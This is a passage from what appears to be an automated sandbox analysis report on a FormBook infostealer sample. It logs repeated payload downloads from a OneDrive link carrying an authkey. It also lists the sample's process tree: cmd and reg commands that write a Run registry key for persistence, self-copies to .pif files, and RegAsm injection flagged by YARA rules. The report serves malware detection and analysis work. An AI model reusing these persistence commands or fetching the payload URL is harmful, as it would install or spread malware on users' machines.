                                                            Connection: close
                                                            Content-Length: 0


                                                            Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49720 | Destination IP: 13.107.139.11 | Destination Port: 443 | PID: 5480 | Process: C:\Users\user\Documents\4Ear91jgQ7.pif.pif
                                                            Timestamp: 2024-07-23 12:50:09 UTC | Bytes transferred: 131 | Direction: OUT | Data:
                                                            GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            Timestamp: 2024-07-23 12:50:10 UTC | Bytes transferred: 1166 | Direction: IN | Data:
                                                            HTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mE8p9HhoIpPnY2ZSkO-k2QoyiDP1eEVixXoeiZO3gSa-GRM46_Yn-B7ipY2YArCUEXMbzS0jCbLSAwIYGzRwTwkvUXqgbpLt_sfrFQ2t9CbfIM13GEK-j2Bw37G_aIUK80UtufByI7Dv3iEQlq4jdVTglElukksYr1qT0qYuU94kj-S8y8evhed-fwHpxWzdeFExh6JuSm262iQK-cqz8zw/1336?download&psid=1
                                                            Set-Cookie: E=P:GD12/BWr3Ig=:hdzz1Vbz1O2YEHrle52sBV/gfldeUhGm0BwUy0GycAw=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=f8e7a1a7-278a-4d4b-a0ac-7e23d7b1d586&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:10:09 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:50:10 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-c4dpk
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 0639599D363041FF9202B14959ACE0E4 Ref B: BN3EDGE0806 Ref C: 2024-07-23T12:50:09Z
                                                            Date: Tue, 23 Jul 2024 12:50:09 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49724 | Destination IP: 13.107.139.11 | Destination Port: 443 | PID: 3596 | Process: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif
                                                            Timestamp: 2024-07-23 12:50:19 UTC | Bytes transferred: 131 | Direction: OUT | Data:
                                                            GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            Timestamp: 2024-07-23 12:50:20 UTC | Bytes transferred: 1166 | Direction: IN | Data:
                                                            HTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mmRCyddZd8TgumTkc0WgJGPW0Be2KAP8RA1AGW9Yg-qGmwy0u0VLZAuymVEdH6LS2hunPfbQa7Y1U_7jZif9lk_B22Shn64OiUwpXdPJ8JhB0pewOhd59wFVEYaupOMWpD_DmPCg68qZxJekp6vjll6NDHxnQSbRFlUjIi-RbVmxZ6KNCc4nNtWf7LBcTvFklYr9m5BhztalIC6ouEy5KoQ/1336?download&psid=1
                                                            Set-Cookie: E=P:0xuIAhar3Ig=:wfox8g52O2phG/bveGS6hXV8eeggcb4x75WPkmRaMC4=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=99938a5a-b8a5-49af-8692-54fa982fa467&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:10:19 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:50:20 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-9xdkw
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: C791950761AB41D5BB08AD0884127577 Ref B: BN3EDGE1008 Ref C: 2024-07-23T12:50:19Z
                                                            Date: Tue, 23 Jul 2024 12:50:20 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49726 | Destination IP: 13.107.139.11 | Destination Port: 443 | PID: 5000 | Process: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif
                                                            Timestamp: 2024-07-23 12:50:30 UTC | Bytes transferred: 131 | Direction: OUT | Data:
                                                            GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            Timestamp: 2024-07-23 12:50:30 UTC | Bytes transferred: 1166 | Direction: IN | Data:
                                                            HTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mo4p-JVtoRBSqHrQiA9KeG1S6nMOtlwjW-1eDspeJcYnm3M5qDvMNKDA9M8fz9FBKVFRpIcYs9k1YQpyhl8h75Emp2jnmGBT3gNu0O5K_9I_Fu9j2vSz4mbjL0OLd7cqhqRLVzAt_TSzSQi6j5fqCGjn0mPkwZ9rXrQf0j6EGE7KLc_wQ8CDEbhZQDkBby1KNC1Omwz1708n3gsE1enuaBA/1336?download&psid=1
                                                            Set-Cookie: E=P:Kwa2CBar3Ig=:HxZ3IcT03royBW2bXc8MbQWL2xclplGWd+l2QJDLiTI=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=1bf5ebe6-233f-4568-a831-8bdd0b890d0b&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:10:30 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:50:30 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 798f966fd6-n9mr8
                                                            X-ODWebServer: nameastus2946819-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: DB7681309EE74B6CAB08463CCFCDEB0D Ref B: BN3EDGE0417 Ref C: 2024-07-23T12:50:30Z
                                                            Date: Tue, 23 Jul 2024 12:50:30 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49731 | Destination IP: 13.107.139.11 | Destination Port: 443 | PID: 6476 | Process: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif
                                                            Timestamp: 2024-07-23 12:50:45 UTC | Bytes transferred: 131 | Direction: OUT | Data:
                                                            GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            Timestamp: 2024-07-23 12:50:45 UTC | Bytes transferred: 1166 | Direction: IN | Data:
                                                            HTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mP83fG79GWrLdMGamez0hrTjn2wKcdfccPJocaqFvFmy0YwM8XhejQeyEmWBqIIPJ4xs9LXEkpj_o4KrH50yMbeBOlAQHzBa2ik_KEaFUkt01u3kPPSjNu_ONhGKfZw2xv0ya9Bjy-WyPP5UlGFUBLfliOZ783puOsDd-P--OHFWJhONBZvsh8h2UO7HpuP_Bt1l-YemcNtxbWckY_uIoaA/1336?download&psid=1
                                                            Set-Cookie: E=P:VGuKERar3Ig=:0WJ3tCd42pdh2rk9UZzG/COtpfdx3gZpIr1H6JrFH2U=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=fd39969b-f6a5-4f39-9789-de006a28eacf&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:10:45 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:50:45 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 798f966fd6-q5pxf
                                                            X-ODWebServer: nameastus2946819-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: DFBB582289984EDDACB1F0F2481E1F55 Ref B: BN3EDGE0417 Ref C: 2024-07-23T12:50:45Z
                                                            Date: Tue, 23 Jul 2024 12:50:44 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49738 | Destination IP: 13.107.139.11 | Destination Port: 443 | PID: 4012 | Process: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif
                                                            Timestamp: 2024-07-23 12:50:53 UTC | Bytes transferred: 131 | Direction: OUT | Data:
                                                            GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            Timestamp: 2024-07-23 12:50:53 UTC | Bytes transferred: 1166 | Direction: IN | Data:
                                                            HTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4m4LKvhJ_pTnz9rawaJjs2KZErvU8neZdJYfN9Hc3hkDV_oDM8LwyhXl_csc1M6IVr9j39XcRd2c3JH5ifRWcHnG96-DkFbmRC6M0IEX29mWAGvY_XTsGaeHEJQqjdk0qZZruqZEYr2Nb7DYr2g7GTfPM5m7O6Y4M0rLAz-7PfXpxvp_dUo3N8NEojuATgtxcEIA0PcLjYIhMj8lppZmEvNw/1336?download&psid=1
                                                            Set-Cookie: E=P:8BJ4Fhar3Ig=:0eArn1GrFjzOopzvwvL9povNbUb+muyTJ6tF+TjsO5g=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=50d05305-be3d-4c2c-acb3-1956eff24084&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:10:53 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:50:53 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-88qx4
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 360545862FEF4472A4EA8CAD8C56BB5D Ref B: BN3EDGE1108 Ref C: 2024-07-23T12:50:53Z
                                                            Date: Tue, 23 Jul 2024 12:50:53 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.5 | 49750 | 13.107.139.11 | 443 | 5244 | C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-07-23 12:51:06 UTC | 131 | OUT | GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:51:07 UTC | 1166 | IN | HTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4m55yNyrfmR788IlgrTwCE-wIZNwJTU2JVOtkkPb1qgGdeCZ2PORv3tzG8rnttZ1cBKL04EkX2-vwddORg2bHrj19D0NiIXLgs7Ip-Kas_RqNKLXnXQPDX-cUF96UNTYBgT0hPsPvovmD0orrFaH33g6_KnParegKGJfSApXH130JRCQ6Bkp-xYeKcsqKnCR7u52QCSFVUy3RsjmoMBAC6qA/1336?download&psid=1
                                                            Set-Cookie: E=P:TQxRHhar3Ig=:OgmSgQ1MPc3HOXzaE6ZEO3Gvc8XcUh63cGYZMTv8Mo0=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=48db18a0-0f25-40a9-a580-9c8b0ae205f7&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:11:06 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:51:07 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 798f966fd6-8kfpv
                                                            X-ODWebServer: nameastus2946819-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 0F96CA3D93AD422AB7535245645963C3 Ref B: BN3EDGE0915 Ref C: 2024-07-23T12:51:06Z
                                                            Date: Tue, 23 Jul 2024 12:51:06 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            10 | 192.168.2.5 | 49754 | 13.107.139.11 | 443
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-07-23 12:51:15 UTC | 131 | OUT | GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:51:15 UTC | 1166 | IN | HTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mYBTVl_EZSczCNLvo6UnuN8mIkFvxYrYueuwLpcEaD5fKAGhPXGGNWygHS093fm7Ar9ni1AuO8Vco9R4ysQrwvtojC8NUn9YKvcyOuy4HPNMG695BHaejdO-XplPW_ieGWk7e8cnUQOQO2iGOZlDe4kG7S3L7YlJm4mOjotIMXh7JflXSzkjcYtGZaognOORAFSpQIa3bssdMpCwByFKXUg/1336?download&psid=1
                                                            Set-Cookie: E=P:LoyIIxar3Ig=:KzBdRhrwS9vAQd2rXTg6KISV9Y4yXU8hF3EMt3hlYXY=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=1032a074-696c-4bfe-9b3c-8eed3b1f1a4e&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:11:15 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:51:15 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-k5psb
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 0E5148A7C10840968CABC15320A30772 Ref B: BN3EDGE0220 Ref C: 2024-07-23T12:51:15Z
                                                            Date: Tue, 23 Jul 2024 12:51:15 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            11 | 192.168.2.5 | 49756 | 13.107.139.11 | 443
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-07-23 12:51:23 UTC | 131 | OUT | GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:51:24 UTC | 1166 | IN | HTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4myujGNEKaXc3HxIkx_ELXT2vVTE9jsfC4Wl6vz2jHQ6AvU5wQxlWg93vv2Lk0Q9-jZiWc5DNxrSFAq8RPtRIGok1vMy9R8bJdmJgIAPmYGAlNXL_f7zRrODcEXDPWngbOillL8fmIt_qK8DSkU4Io2ZqyS8Kbrp1EaJlC-4YX8aOhVMNk3UZhlDDZhY4PkOAHj8-O2PN5bHiiOeqzCHOwEA/1336?download&psid=1
                                                            Set-Cookie: E=P:y9KyKBar3Ig=:2u2WimKKfgdAd4kNuz9u5qOW/4Y4omjcFEbZIIsD6Gs=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=ee9cce3b-e89f-41cb-85a8-60ba39791cf7&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:11:24 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:51:24 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-88qx4
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 848B0147D81A4BE3BB7E66BEBEDDC956 Ref B: BN3EDGE0721 Ref C: 2024-07-23T12:51:23Z
                                                            Date: Tue, 23 Jul 2024 12:51:24 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Target ID:0
                                                            Start time:08:49:15
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Desktop\4Ear91jgQ7.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\4Ear91jgQ7.exe"
                                                            Imagebase:0x470000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:08:49:19
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:08:49:19
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:08:49:19
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:08:49:21
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Desktop\4Ear91jgQ7.exe" "C:\Users\user\Documents\4Ear91jgQ7.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:08:49:21
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:08:49:22
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xb90000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:08:49:30
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif"
                                                            Imagebase:0x700000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 13%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:08:49:35
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:08:49:35
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:08:49:35
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:08:49:37
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:08:49:37
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:08:49:38
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xe20000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:08:49:38
                                                            Start date:23/07/2024
                                                            Path:C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe"
                                                            Imagebase:0xed0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            Target ID:17
                                                            Start time:08:49:39
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif"
                                                            Imagebase:0xf10000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:08:49:40
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\findstr.exe"
                                                            Imagebase:0xf00000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
